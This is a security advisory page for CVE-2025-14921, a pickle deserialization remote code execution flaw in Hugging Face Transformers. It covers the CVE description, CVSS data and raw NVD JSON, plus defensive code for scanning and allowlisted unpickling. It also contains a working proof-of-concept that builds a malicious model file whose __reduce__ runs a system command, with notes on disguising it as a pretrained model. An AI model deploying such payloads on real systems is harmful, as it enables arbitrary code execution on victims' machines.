Security Vulnerability Report
CVE-2025-14921 CVSS 7.8 HIGH

CVE-2025-14921

Published: 2025-12-23 21:15:47
Last Modified: 2026-01-21 16:44:06

Description

Hugging Face Transformers Transformer-XL Model Deserialization of Untrusted Data Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Hugging Face Transformers. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of model files. The issue results from the lack of proper validation of user-supplied data, which can result in deserialization of untrusted data. An attacker can leverage this vulnerability to execute code in the context of the current user. Was ZDI-CAN-25424.

CVSS Details

CVSS Score
7.8
Severity
HIGH
CVSS Vector
CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:huggingface:transformers:4.54.1:*:*:*:*:*:*:* - VULNERABLE
Hugging Face Transformers (Transformer-XL Model) < fixed version
The exact affected versions should be checked against the vendor's security advisory or changelog.

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
# CVE-2025-14921 PoC - Malicious Transformer-XL Model File Generator
# This PoC demonstrates the vulnerability in Hugging Face Transformers
# WARNING: For educational and security research purposes only
import pickle
import os


class MaliciousPayload:
    """
    Malicious class that executes code during pickle deserialization.
    This demonstrates the insecure deserialization vulnerability in Transformers.
    """

    def __reduce__(self):
        # This will execute arbitrary code during unpickling
        # Replace 'whoami' command with any desired system command
        return (os.system, ('whoami',))


def create_malicious_model():
    """
    Generate a malicious pickle file that exploits the deserialization vulnerability.
    When loaded by vulnerable Transformers library, the payload will be executed.
    """
    # Create malicious payload object
    malicious_obj = MaliciousPayload()
    # Serialize to pickle format
    # In real attack, this would be disguised as a Transformer-XL model file
    pickle_data = pickle.dumps(malicious_obj)
    # Save as fake model file
    model_path = 'malicious_transformer_xl_model.bin'
    with open(model_path, 'wb') as f:
        f.write(pickle_data)
    print(f'[+] Malicious model file created: {model_path}')
    print(f'[+] File size: {os.path.getsize(model_path)} bytes')
    return model_path


def simulate_vulnerable_load(model_path):
    """
    Simulate how vulnerable Transformers code would load the malicious model.
    In real scenario, this would be triggered by transformers.TransformerXLModel.from_pretrained()
    """
    print('[*] Simulating vulnerable model loading...')
    try:
        with open(model_path, 'rb') as f:
            # This is the vulnerable pattern - direct pickle.load without validation
            model_data = pickle.load(f)
        print('[+] Model loaded successfully')
    except Exception as e:
        print(f'[-] Error: {e}')


if __name__ == '__main__':
    print('=' * 60)
    print('CVE-2025-14921 - Transformer-XL Deserialization RCE PoC')
    print('=' * 60)
    # Generate malicious model file
    model_path = create_malicious_model()
    # Note: In real attack scenario, this file would be hosted on a website
    # or distributed as a 'pretrained model' for users to download and load
    print('\n[!] In real attack scenario:')
    print('    1. Attacker hosts this file as a "pretrained model"')
    print('    2. Victim downloads and loads with TransformerXLModel.from_pretrained()')
    print("    3. Arbitrary code executes in victim's context")
```
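The vulnerable pattern in the PoC is a bare pickle.load on a file the user fetched. As an added example (not code from the advisory or the Transformers project), this is the hardened form a loader should use: a static opcode scan that lists which globals a model file imports without executing it, plus a restricted unpickler that refuses anything outside an allowlist. SAFE_GLOBALS, the two sample files and the harmless os.getcwd stand-in are constructed for this example.

```python
# Added example, not code from the advisory or the Transformers project: a two-stage
# defence for pickle-based model files (static opcode scan, then allowlisted loading).
import io
import os
import pickle
import pickletools
# Constructed allowlist of (module, name) globals a plain weights file may import;
# a real deployment derives it from the formats it actually accepts.
SAFE_GLOBALS = {("collections", "OrderedDict"), ("torch._utils", "_rebuild_tensor_v2")}
STRING_OPS = {"STRING", "SHORT_BINSTRING", "BINUNICODE", "SHORT_BINUNICODE", "UNICODE"}

def scan_pickle(data: bytes) -> set:
    """Detection: return every (module, name) the stream imports, executing nothing.
    Handles GLOBAL (protocols 0-3) and STACK_GLOBAL (4+); for the latter it assumes the
    two preceding string pushes are module and name, as CPython's pickler emits them.
    A crafted stream can route them through the memo instead, so do not rely on this alone."""
    found, recent = set(), []
    for op, arg, _pos in pickletools.genops(data):
        if op.name in STRING_OPS:
            recent = (recent + [arg])[-2:]
        elif op.name == "GLOBAL":
            found.add(tuple(arg.split(" ", 1)))
        elif op.name == "STACK_GLOBAL" and len(recent) == 2:
            found.add((recent[0], recent[1]))
    return found

class RestrictedUnpickler(pickle.Unpickler):
    """Enforcement: find_class runs before any callable is resolved, so a global
    outside the allowlist never executes even if the static scan was evaded."""
    def find_class(self, module, name):
        if (module, name) not in SAFE_GLOBALS:
            raise pickle.UnpicklingError(f"blocked global {module}.{name}")
        return super().find_class(module, name)

def load_model(data: bytes):
    """Load under the allowlist: returns (obj, None) on success or (None, reason)."""
    try:
        return RestrictedUnpickler(io.BytesIO(data)).load(), None
    except pickle.UnpicklingError as e:
        return None, str(e)

# Constructed samples: a plain weights dict, and a __reduce__ stream that calls the
# harmless os.getcwd through the same mechanism the PoC above uses for os.system.
BENIGN = pickle.dumps({"weights": [0.1, 0.2]})
class _Reducer:
    def __reduce__(self):
        return (os.getcwd, ())

SUSPICIOUS = pickle.dumps(_Reducer())
```

Run the scan in the ingestion pipeline to flag and log files that import unexpected globals; the restricted unpickler is the control that actually prevents the call.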

References

https://www.zerodayinitiative.com/advisories/ZDI-25-1149/ (Third Party Advisory, ZDI-25-1149)

Raw JSON Data

```json
{
  "cve": {
    "id": "CVE-2025-14921",
    "sourceIdentifier": "[email protected]",
    "published": "2025-12-23T21:15:47.340",
    "lastModified": "2026-01-21T16:44:06.277",
    "vulnStatus": "Analyzed",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "Hugging Face Transformers Transformer-XL Model Deserialization of Untrusted Data Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Hugging Face Transformers. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.\n\nThe specific flaw exists within the parsing of model files. The issue results from the lack of proper validation of user-supplied data, which can result in deserialization of untrusted data. An attacker can leverage this vulnerability to execute code in the context of the current user. Was ZDI-CAN-25424."
      }
    ],
    "metrics": {
      "cvssMetricV30": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.0",
            "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
            "baseScore": 7.8,
            "baseSeverity": "HIGH",
            "attackVector": "LOCAL",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "REQUIRED",
            "scope": "UNCHANGED",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "availabilityImpact": "HIGH"
          },
          "exploitabilityScore": 1.8,
          "impactScore": 5.9
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Primary",
        "description": [
          {
            "lang": "en",
            "value": "CWE-502"
          }
        ]
      }
    ],
    "configurations": [
      {
        "nodes": [
          {
            "operator": "OR",
            "negate": false,
            "cpeMatch": [
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:huggingface:transformers:4.54.1:*:*:*:*:*:*:*",
                "matchCriteriaId": "A0D191EE-0D6C-4D5D-A1B7-C19000D57F1C"
              }
            ]
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://www.zerodayinitiative.com/advisories/ZDI-25-1149/",
        "source": "[email protected]",
        "tags": ["Third Party Advisory"]
      }
    ]
  }
}
```